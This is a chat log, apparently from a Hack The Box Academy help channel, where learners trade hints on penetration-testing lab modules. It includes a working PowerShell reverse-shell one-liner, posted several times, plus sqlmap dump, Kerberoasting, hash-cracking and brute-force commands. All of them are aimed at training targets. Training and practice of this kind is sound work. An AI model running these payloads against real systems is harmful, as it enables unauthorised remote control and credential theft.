for example: Linux Fundamentals module - Filtering section

okay sorry

i try again

I need some help with the Module AI. This is my last exercise his name is Skills assessment

i need help

on https://academy.hackthebox.com/module/147/section/1327
Password Attacks - Network Services
Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
i use hydra and it take long time . it normal , i use the provided list

try using crackmapexec

ok

ey guys I need a little help pls 🙂

smbclient -L //tragetip -N

with AI

Maybe try the -N next to -L instead of after the target ip

Or try restarting the target ip

Use 4 slashes at the beginning

Smbclient isn’t positional

It wouldn’t matter where he put it

As long as he has the syntax right it should be good

ey guys someone had finished the module AI?

why all offline ?

Need some help on the SA for windows lateral movement, anyone that can provide a hint? 🙂

Which module

ey guys someone had completed the module AI?

https://academy.hackthebox.com/module/237/section/2612 -> First question

In the Introduction to Digital Forensics -> Rapid Triage Examination & Analysis Tools -> first question

I did the exercise in a whole different way, after trying the way the exercise asks and didn't get the answear. If anyone could help me get the answer the way the exercise asks I'd appreciate the help

Would anyone mind giving any advice on the Shells & Payloads - The Live engagement questions. For Host 1, I seemingly am having a tough time finding the attack vector. For the hints, it states "if you look at status.inlanefreight.local or browse to IP on port 8080, you will see the vector". However trying to access the URI on my KALI VM, it always shows an error which im assuming its blocking outbound connections to HTTP. However, xfreerdp session on the foothold IP doesn't have any browser besides torr which needs internet connection. I've also tried using metasploit auxilliary scans which i found nothing. On top of it all, I tried establishing a bind shell with netcat and I can't get that to work as connections seemed to be refused everytime on my client machine. Any guidance?

Hey all! I'm having some trouble with the Intro To Python 3 module.... on the last page it has a question about what type of data a specific item is.... but when i use the Type() command in there, and input the result, it tells me that it was wrong.

I've even gone through and input all the data types i can remember to try and identify... but I still cant seem to get it. Any general guidance would be highly beneficial! Still trying to figure this all out

there is book python in amazon 🙂

you can dm me even though I believe you got it right, maybe copy/paste is the problem.

Windows lateral movement, skill assessment

You can DM

r1cky can I dm you?

Sure

The question shows you the expected format of the answer. Be sure to include the full output from from your call to type(). If you're still having trouble, show me the code you're using.

oh, apologies, I see someone else offered help

autom4il pointed that out to me haha. I mistakenly had just put in the data type sans the rest of the output.

I do appreciate the follow up though! Amazing to see the community help here!

Can I have a hint on Directory Fuzzing (Modul: Attacking Web Applications with Ffuf)?

oh got it 🙂

~~Hey everyone, sorry to bother but could I get a little nudge on these two questions in Windows Privilege Escalation - Pentest in a Nutshell? I feel like I already have all the info I need, with access to the script and some other info being laid out, I'm just wondering if it is purely a wording issue on my end or if I am missing the scope of the question entirely. Thank you all :)

(feel free to dm, appreciated even!)~~

EDIT: managed to solve it, but I would politely ask for better phrasing in these two questions, I spent a while just writing synonyms. Regardless, thank you for the entire team for this awesome community and platform, and hope everyone has an awesome day! :)

Did you get to do this on pwnbox / a vm? Can’t seem to run genymotion on pwnbox

Running a .exe from evil-winrm atm. Does anyone know how to view the .exe's window without RDP access?

You can't

evil-winrm doesn't have a gui

I figured but there's no work around ig?

That's frustrating thanks

PHP Session Poisoning
hey guys, back to this problem again, I finished it anyway but this step still not adding up, has anyone else done this exercise?
http://<SERVER_IP>:<PORT>/index.php?language=session_poisoning
this won't work and not sure if this would be an important step in the CPTS Exam

What's your problem? Sounded like you figured it out

in this exercise (php session poisoning) there are like 4 'simple' steps, but the only one not working or at least showing the same result is this session_poisoning test
https://academy.hackthebox.com/module/23/section/252

What do you expect when are you doing ?language=session_poisoning?

it is supposed to show exactly the value you used as test, and show as result in the page confirming it can be poisoned and then proceed with other steps

the fact that it is not working as shown in the exercise, just wanted to be sure this wont affect the exam

no, that's not how that works

By using ?language=session_poisoning you change the contents of the session file on disk. At this point in time nothing will change on the web page.
The next step includes this session file from disk and then you'll see the string session_poisoning on the page.

There are not really 4 steps. There are just 2. You poison the session file and you include the session file.

ADCS Attacks > Certifried > I can reproduce the attack up to the certipy auth command. Then its always a timeout. Any help would be appreciated

Shells & Payloads - Live engagement > can't find a way to access the manage page for the 1st host ip: 172.16.1.11:8080. Am i supposed to configure the Tor browser settings properly in the xfreerdp session? Can't seem to access the page on my VM

nvm i found it

I'm not surprised by this given the nature of exchange, but glad to see i'm not the only one

It wasn't super bad when I did it, but I unfortunately had to reset it like twice, which sucked because I'd let it sit for 10-15 mins after restarting just to give it time.

Yeah maybe I just need to reset a bit more often and deal with waiting

the shells and payloads module assessment has you access a foothold where you're doing the attacks from; so you can't directly connect to the targets. all of the requisite hosts file stuff is on the target host, which in this instance is acting as a jump host

If you need a sanity check on of a reset is potentially needed, you can DM whenever.

I was getting Powershell out of memory errors running PowerView commands, it's probably a good sign

Ohh

Thank you, i found that trying anything on my actual machine was pretty stupid since the foothold host already has internal access. I was also a big enough dummy to just realize I was using the wrong IP for LHOSTS and finding the firefox browser was as simple as Firefox &.... Thank you for the help though

No

Have you tried: checking command history? 👀

also you'd need to zip the folder to transport everything inside it

otherwise you'd have to grab each file within the folder individually

i think that i need first mut a password list with will user and use hydra to peform a bruteforce in ftp (or ssh) to find a password like how i do to found kira password... i'm correct?

That's a folder not a file, hence the different color. You can transfer folders with scp.

command looks good. it says permission denied. probably kira doesn't have access to will's folder.

Also going to delete your post, please make sure not to post content from modules above tier 0

ok no problem, my bad

will is a secondary user you'll find.

iirc his password isn't in the mut list

it's found in one of the methods displayed from that section

Figured it out. I couldn't find a way to sign the myapp.apk in Android Studio so I used apksigner.... I'll let you figure that part out.

Hey I am doing the AD enumeration and attacks skill assessment and I am having a problem getting powerview to work on the first host. I have an established a meterpreter shell where I used the shell command followed by PowerShell.exe, but when I import the powerview module the cmdlets return an error. I am certain it’s the right binary and thought maybe it was the meterpreter shell so I connected using evil-winrm but that did not fix it

Thanks for this. I just completed this module. Nice subject learning module but oof, resetting these boxes was a pain

Yeah I enjoyed that one.

Does anyone know anyway to get free cubes

last season, cubes were a reward

referrals also reward cubes i believe

okay tks

Hello everyone. Given that this is my first message, is nice to be here with you. I hope that someone can help me :).

I am right now at the lesson Repeating Requests under the. module Using Web Proxies. There is an activity to do to find out the sencond flag using Burp. I can navigate into all the destination server folders modifying the responses in Burp, and even using commands like "find", there is no way to find out the second file "flag.txt". Of course I have search *fl, *.txt, and many other options together with find command and of course searching in all subdirectories.

Any suggestion about how to get the second flag?

it can be hidden or not shown by the normal user

Hi everyone. Quick question, I am doing the Cross Site Scripting XSS Module but in the Phishing section I cannot get the listening port to work with | php -S 0.0.0.0:80

Any tips?

Hi, can something tell me how you got the second flag on Skill Assessment Active Directory Trusts Attacks module?
I have tried doing a SID History Injection with a replacement SID for the HR_Management group, but this unfortunately doesn't work and I've been trying to debug this for the second day now, but nothing works

What error are you getting?

Its saying: Failed to listen on 0.0.0.0:80 Reason: Address Already in Use

I did netstat -tuln but did not see the ip and port there

Well the reason seems pretty clear. You could confirm that the address is already in use by issuing an:

sudo ss -lnp

and you should see 0:0:0:0:80 in use. I don't why that wouldn't show with netstat -tuln

but either way, if port 80 is in use what are your options?

Options will be to change the port to one that is not listening or being used. I did php -S 0.0.0.0:8080 it worked but did not listen when requested the url. Not sure why I am doing wrong.

well, 0.0.0.0 means all interfaces, so if port 80 is being used anywhere else, you won't be able to use port 80 at all. Your first one should work, a different port.

What are you on, XSS? You can DM me with what you're trying. I helped somewhere in that module yestday so I think I still have it open & can spin things up.

That has put me on paused for a week now. Keep going at it but sadly still stock. Even tried using google dorks for references

Can anyone give a hint on the last question of ADCS Attack Skills Assessment?

Which word list should I use to get the result in this exercise: "Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag." I'm using ZAP instead of Burp for obvious reasons, but after trying big.txt or common.txt I didn't get any good results.

does anyone have any useful documentation or resources on the basic steps to go about pentesting?. I just started the Pentesting job path and am struggling to find the flag for the public exploits section. i find the infomation in the modules is very good but im gettin bit stuck of putting some steps toghether and finding some steps are missing that i need to understand fully.

I like the file, word and directory lists from seclists: /usr/share/seclists/Discovery/Web-Content/

I can't say which you should use, but I'd be surprised if at least one of those didn't work.

can you give me larger word lists. I used seclists common.txt and big.txt but none of them found the right solution.

yes, look for 'large' in the filenames.

forgot what it's called but there is one of them that has a name like directory-list-1.0

the smallest one is big enough

okay, I'll try that

large can be overkill, but I looked at the directory, the ones I like are raft-[small|medium|large]-[files|directories|words].txt directory-list-1.0 in there too.

Will the HTB Penetration Tester path's content be revised soon?

Okay found it. Thanks for the help

i need help with Exploiting SQLi via WebSockets

good afternoon, can anyone tell me why the cubes in the academy come out in negative, -182 cubes.

what. negative cubes?

yes

can you send a screencap

wtf?

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

ask support i have no clue

SQLMap Essentials > Building Attacks > Attack Tuning

• Question: What's the contents of table flag5? (Case #5)
• Command Craft: sqlmap -u 'http://redactedip.com/case5.php?id=1' --level=5 --risk=3 -T flag5 --technique B --dump --batch -v 3 --no-cast

Having an issue getting the proper flag, I have found another one replacing it with "muc!_..." but still no go. Any idea what I'm messing up on?

The hint says to run the command a few times to ensure it's correct, I've ran it and no longer getting anything different then what I've got

currently doing the Shells and Payloads module on the bind shell part, i’ve created a bind shell on the target and i’ve connected on my attack host, however i can’t change directory or anything once in the bind shell to get the flag? if i input the directory its located it just doesn’t do anything

Do you have my module complete? I'll look at my notes for ya

don’t worry my mistake, was missing a part of the command at the end

No problem

I'm around if you need any more help for a bit

appreciate it anyways 🙂

Thank you 🙂

Have you done SQLMap Essentials (Basic Toolset > Skill path)?

I have not - i’m currently like 28% through CPTS

Goodluck with your journey 🙂 I took a break at 60% and went to the Skill Paths for a bit

It gets hard at AD & Enumeration I'd say

If you're still stuck on this I won't give you the answer, but you can DM.

I'm new to hack the box. I'm having a heck of a time getting the shell to accept my password. Sometimes I can get in and sometimes I can't. I don't see anywhere where it says the password might change from time to time. I'm working on the inro to the cmd line module, so very basic stuff. I don't understand why the instance will not accept my password. Can anyone help? Also, because I am at the intro course, and I can't seem to get the instance to accept my password, as a consequence I can't figure out if were supposed to be running the command as we go thru the course. For example, like on the powershell section are we supposed to install the AD module as we move along?

Looking for help on Footprinting, DNS section, Q4 finding host with last octet .203. Been at it for 2 days. Different word lists, dig switches, and dnseum… I’m lost. Anyone got help beyond “dig deeper” or “different word list?”

not to say you are but I know I kept missing it in the list of ips when doing that one. and had to make my eyes read each ip address to find the 203. for some reason they way the formatting was I kept skipping that one ip address.

also do a search on this forum for a lot of the module questions. I have found it also helpful.
https://forum.hackthebox.com/t/what-is-the-fqdn-of-the-host-where-the-last-octet-ends-with-x-x-x-203-i-dont-know-what-do-anymore/273242
if that link doesn't help also do a searh for dns .203 etc check each post and replies

Hello everyone

Hi

What is the command you're putting to ssh in?

hi currently doing the network enumeration with nmap module, Firewall and IDS/IPS Evasion - Easy Lab

And I have found the flag but when I paste it in, it does not seem to accept it. It is the typical HTB{key blah blah} and for some reason htb doesnt like it?

Can anyone help or should I restart the target?

As the person who just opened and started reading the very first module i can not help you

The question is different on the easy lab i believe

omg i didnt even read the question lol im assuming i found the harder answers mb lol

Hahah thought so

Wait lab difficulty is based upon luck

no but some of the questions are harder in the same lab. step 1 ssh to this box. get flag. then sql to this get flag... you find the sql flag thinking it is the one for the ssh

Anyone else having issues with logrotten section on Linux Priv Esc

pain in the ass I saw this for a millisecond: └──╼ [★]$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.15.225] from (UNKNOWN) [10.129.79.6] 42534
root@ubuntu:~# and then it closed quickly. now everytime I run the command, it never works again....

my box for reverse shell is done. can't even ping it anymore. tried refresh .. ;-/

same don't work

thanks for the advice. I’ll give it a try and I’ll def check the link. I’m running outputs through GPT just to double check if I missed it.

that is the no longer active htb forum link

Can anyone help guide me on the reverse shell lab?
I rdp to the desktop of the windows box. Disabled anti-virus.
copy pasted the command into powershell (admin) and (non-admin) and it throws a syntax error.

not asking for help on the lab. just wondering why if it is directly from the lab as a command it is throwing a syntax error.

Can you show how you input the command?

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.43',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = (

that was copy and pasted directly from the lab.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

First one missed a part yes. The second one should work.

just repasted and verified it had full paste. still got same error. like it is missing a " or a ' somewhere.

Which module is and section?

here is a copy from the screen with full command

I also tried the 3 listed as reverse shell cheat sheet under powershell that was referenced in the lab.
swisskyrepo.github.io

ok

tried c:\users\public (current directory)

same error

use CMD instead of PowerShell, to add more context it does not like some chars and you can always make the payload base64 and then use it directly PowerShell. The alternative is to find a way to not mess with some special chars and do some escape.

ugh.. ok will try that

that worked. ran from cmd

so trying to understand if it is a powershell command. shouldn't I have been able to remove the "powershell" part and then run it in powershell directly?

its still powershell, your command start with powershell meaning it will run in powershell

yea but when I ran it in powershell putting in the command it flagged the error. it only worked (thank you by the way) in cmd.exe

not understanding why it failed in powershell if it is a powershell command

you run powershell in cmd.exe

what if I took out the word powershell and ran the rest of the command in powershell cli? why would it fail then?

and thank you very much for that help. was bashing my head on this all day.

Yo guys somebud help

Im on password attacks

Linux pass the ticket thing

I cant connect the pwnbox to the AD network

I can't connect to the server via SSH from my VM. This is for the SOCKS5 Tunneling with Chisel section of Pivoting, Tunneling, and Port Forwarding module:

──(kali㉿kali)-[~/chisel]
└─$ scp chisel ubuntu@10.129.91.21:~/               
ssh: connect to host 10.129.91.21 port 22: No route to host
scp: Connection closed
                                                                                                                                                                                            
┌──(kali㉿kali)-[~/chisel]
└─$ scp chisel ubuntu@10.129.91.21   
                                                                                                                                                                                            
┌──(kali㉿kali)-[~/chisel]
└─$ ssh ubuntu@10.129.91.21       
ssh: connect to host 10.129.91.21 port 22: No route to host

Hopefully this doesn't spoil too much. I downloaded the recommended VPN file.

Ive followed everything correctly

Bro we are having the same problem at the same time

maybe its not me then

No but here its used with -nop. You can always let chatgpt fix syntax, so it will work

powershell -nop -c "`$client = New-Object System.Net.Sockets.TCPClient('10.10.14.169',443);`$stream = `$client.GetStream();[byte[]]`$bytes = 0..65535|%{0};while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0){;`$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i);`$sendback = (iex `$data 2>&1 | Out-String );`$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> ';`$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2);`$stream.Write(`$sendbyte,0,`$sendbyte.Length);`$stream.Flush()};`$client.Close()"

Mine is optional question so maybe i can just

mine is not an optional question. but maybe its something with academy

But what if similar situation happens during cpts

then they probably will give you a new voucher

I meant

If i skipped this thing and didnt learn the skill

2 full days on 1 section come ooooon

then maybe don't skip

Coooorect

right ok

So whos gonna help us now

I mean I know a guy who was helping me on the section I'm on

I can ask if he can help you too

I wish so

Ive been 2 days stuck on this

I can help, its pivotting?

(not this particular problem but on section in general)

Mine is passwors attacks but yeah same problem

Okay dm?

Ive chisel connected to my attack host

Ok

Hey I need some help with an account issue caused by the merge/SSO thing. I no longer have access to any of the modules I paid for and I've lost basically everything lol. Who can I talk to?

you can talk to support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

ok so now I can connect to the ssh server and upload the file but it won't let me run the hacking tool it tells me to run on the SSH server. like the instructions to build it won't work. can someone help me with this? This is for SOCKS5 Tunneling with Chisel section of Pivoting, Tunneling, and Port Forwarding module

I tried the version of chisel used in the instructions and it didn't work. I tried a different version of chisel it still didn't work.

ubuntu@WEB01:~/chisel-1.10.1$ ls
build  client  example  go.mod  go.sum  LICENSE  main.go  Makefile  README.md  server  share  test
ubuntu@WEB01:~/chisel-1.10.1$ cd ..
ubuntu@WEB01:~$ ls
chisel-1.10.1  chisel_1.10.1_linux_386.deb  chisel-1.10.1.tar.gz  chisel-1.10.1.zip
ubuntu@WEB01:~$ cd chisel-1.10.1/
ubuntu@WEB01:~/chisel-1.10.1$ ls
build  client  example  go.mod  go.sum  LICENSE  main.go  Makefile  README.md  server  share  test
ubuntu@WEB01:~/chisel-1.10.1$ cd ..
ubuntu@WEB01:~$ ./main.go
-bash: ./main.go: No such file or directory
ubuntu@WEB01:~$ cd chisel-1.10.1/
ubuntu@WEB01:~/chisel-1.10.1$ ls
build  client  example  go.mod  go.sum  LICENSE  main.go  Makefile  README.md  server  share  test
ubuntu@WEB01:~/chisel-1.10.1$ ./main.go
-bash: ./main.go: Permission denied
ubuntu@WEB01:~/chisel-1.10.1$ sudo ./main.go
sudo: ./main.go: command not found
ubuntu@WEB01:~/chisel-1.10.1$ chmod +x Makefile
ubuntu@WEB01:~/chisel-1.10.1$ Makefile
Makefile: command not found

go build

or

go install github.com/jpillora/chisel@latest

alternatively, download the latest release

https://github.com/jpillora/chisel/releases

the instructions for building the binary are in the section.

I think go is not installed on the Ubuntu server and it won't let me install go

but someone else is helping me so I'll try what your saying again after I see if what they tell me works

customerops@hackthebox right? Sent an email but wanted to make sure that was correct.

Just hoping that all the stuff I paid for isn't lost forever since I've been paying for awhile and was working on my CPTS track

yes. though i am not HTB staff so i won't be of much assistance

No worries. I'm just a bit frustrated is all 😅

I did send the email but I'm just hoping everything I paid for isn't gone and my progress isn't gone x.x

ok I completed the section

Anyone completed Android Static analysis? need help

Even I'm stuck here even with the right debug pwd it shows invalid creds

Hi everyone. Question on the lab for Active Directory Enumeration & Attacks Kerberoasting - from Windows. I keep getting an empty file when trying to create the hashcat file.
I did the following:

1. Prepared the Base64 for cracking (echo "<base64 blob>" | tr -d \n )
   I was able to place the output into a kirbi file from (cat encoded_file | base64 -d > vmware.kirbi)
   But when I'm extracting the ticket using the kirbi2john.py from "https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py", the crack_file is blank.
   I'm trying to replicate, but now when I'm running cat hash2 | base64 --decode > vmware.kirbi, I get a "base64: invalid input" error

Are you doing escaping the \n in your tr command?

echo <base64 blob> | tr -d \\n

Make sure you don't accidentally have a line feed in the encoded_file from when you pasted into the file from your output.

Yes. I use the double quotes right?

I haven't tried without the quotes yet

Without quotes will work if you are escaping with the double backslash

\\n will work

"\n" will work

Hey, did someone finished the skill assessment in the module "Lateral Movement"? I think there is an issue with the lab at the second last flag

Ah. Trying that now

You can DM what you think the issue is and I can tell you if it is or not a lab issue.

I just tried again. When I tried to make the crack_file, it's coming up with no data

Check to see if you can just run kirbi2john

Hi! Yes, I can run it. I don't get an error, but when I check for the crack_file, the size is still 0

Did it print the output to the screen?

Yeah on my pc kirbi2john just outputs the result.

No. there was no output. Just a new prompt

Don't use python kirbi2john.py just try kirbi2john then the name of your file.

If that prints the output, try to simply copy/paste the output into a file, call it crack_file if you want and first try it with hashcat, as i believe it might already be formatted. If not, follow the section guidance on using sed, then try it again with hashcat.

If none of that works, I'll check it out when I'm on my pc later.

Awesome sauce. Many thanks!

Here's where I'm currently at

I think he means just
kirbi2john no .py

Cool. I will try that as well

Excelsior!

That worked. Was racking my brain for hours. MAny thanks!

The crack_file is still showing up as 0 bytes. Can I just use the output from kirbi2john?

Did you get output in your terminal after the kirbi2john?

You'd put that data into crack_file then run sed against it

I was able to successfully crack it. Ok. I didn't put the data in the crack_file though. I didn't think to do that

I guess format was already good 👍

That sed command just makes sure the output hash from kirbi2john.py is formatted for hashcat.

I haven't used the Python tool. I just have the pre installed one on my parrot box

Quick sanity check: after dumping ntds which hashcat modes would you use to crack these hash verisons? aes256-cts-hmac-sha1-96, aes128-cts-hmac-sha1-96, des-cbc-md5. I'm 99% sure I'm using the correct modules but would like to be sure

I think maybe 19600 and 18200?

Has Parrot OS been easier for you as opposed to Kali? Asking because I haven't used that OS yet.

Thanks, the format of my hashes must be incompatible with hashcat or something

I switched from Kali a couple years ago.

I've liked parrot so far and I have no real reason to go back to Kali. I feel like Kali does have more tools out of the box.

I have my parrot setup with everything I need so I don't really feel like switching now haha. Especially over the years adding more tools. I also started using Ansible to easily setup my VMs (thank you ippsec)

I got a a question too.

So I am currently doing some review before CAPE and noticed something that confused me in the ADCS Attacks module.

In the PKINIT section, under "RBCD - Attacking using passTheCert" why is the module saying that we are requesting the Administrator TGT?

To me it looks like we used passTheCert to add our computer on our target's AllowedToActOnBehalfOfOtherIdentity property so we can use RBCD and S4U2Proxy to request a cifs service ticket impersonating the Administrator for the target. Not requesting the Admin's TGT. Right?

That is very insightful. I'll check that OS out. Many thanks again!

I'm going to reread the section I must be missing something

Yeah I worked through the question again doing RBCD and got a cifs service ticket. Not a TGT.

We only get a TGT for our machine account so we can do S4U2Proxy and request a service ticket impersonating administrator.

just want to make sure i'm not hallucinating after doing the AD modules... ExtraSIDs and SIDHistory Injection are 2 completely different attacks right? their only similarity is they both involve account's SID history attribute?

ExtraSIDs is achieve by assigning arbitrary SIDs while forging a golden ticket in a parent domain

SIDHistory Injection where is about assigning an unresolvable SID of a deleted user to a different account's SIDHistory thereby impersonating the ACLs of the unresolved SIDs?

They are totally separate attacks. They do not both involve the SID history attribute. ExtraSIDs abuses the extraSIDs field in a Kerberos ticket while SIDHistory Injection abuses the SIDHistory LDAP attribute in AD.

thanks for clarifying

@ionic crater Please take care not to post spoilers from modules above tier 0, especially skill assessments.

Oh, sorry, it won't happen again. I will read the rule carefully

im writing report for AEN, i got a question, in host & service discovery section which way is more preferable?

I'd strongly recommend simply using the suggested template HTB provides with sysreptr.

It's sysreptor, just confused which would be better way to fill in the hosts/ports...

I used https://github.com/vdjagilev/nmap2md

can make it look exactly the same

damn thanks, this looks interesting

is drupalgeddon3 removed from msfconsole?

can anyone help me with the "Web Attacks - Skills Assessment" i tried everything now

which question?

to find the /flag.php

hi can anybody please help me im stuck at it since 4 days idk what to do,,, im not able to access student offer of 8$ i tried everything i even submitted a ticket yet i have no idea now what to do can somebody please help me

to find the /flag.php

dm

anyone?

What's the difference between one-server and client server? The diagrams look the same and the description doesn't seem to differentiate/state a lot about them. I have a good knowledge regarding webapps in general

https://academy.hackthebox.com/module/75/section/751

password mutation module is a bit weird, why direct people to brute force a specific port but then have the answers point to directing the brute force over an alternative service. seems a bit dumb

also putting the correct 'guess' over 9000 entries into a generated wordlist on a brute force limited to 120ish guesses a min is diabolical work

isnt inode the same as index number??

somehow the system said my answer is wrong

hahhaahha thats not the index number dude

I got a different number, did you cd to the etc dir then stat sudoers?

I dont know if it makes a difference but i didnt "stat /etc/sudoers"

Windows Privilege Escalation Skills Assessment - Part I
Can anyone tell me where i am makng mistake

nc.exe giving shell back when run normally, but when run with "juicypotato" it's not giving any response.

oh then what is?

cd to the etc and then to dir?

i just started and im a self learner, im really at 0 rn, trying my best to go up slowly

When you grabbed juicypotato did it include a powershell script that you could run?

man i cannot provide answer to modules im sorry

no not the answer, the explaination, how do i find index number or in what category that is, what commands or even what is index number about, stuff like that

where do i find step by step instructions for the academy thats not locked behind a paywall?

you shouldnt u should just do research how things work tbh

No sorry, dir is short for directory. If you cd to etc/ then "stat sudoers" is the number the same?

ohh, yea it's still the same

Interesting, i used the inode number for that question and it was correct

ok so im paying a monthly sub to use a VM... got it.

oh so the index number is the same as inode

Yes

maybe you're at the wrong section?

that's weird, how am i supposed to do this then? any suggestions?

what do you mean at the wrong section?

think about that index

You could try resetting the target and repeating the steps you took

are you referring the VM like this one?

that's what im doing...

ah okay!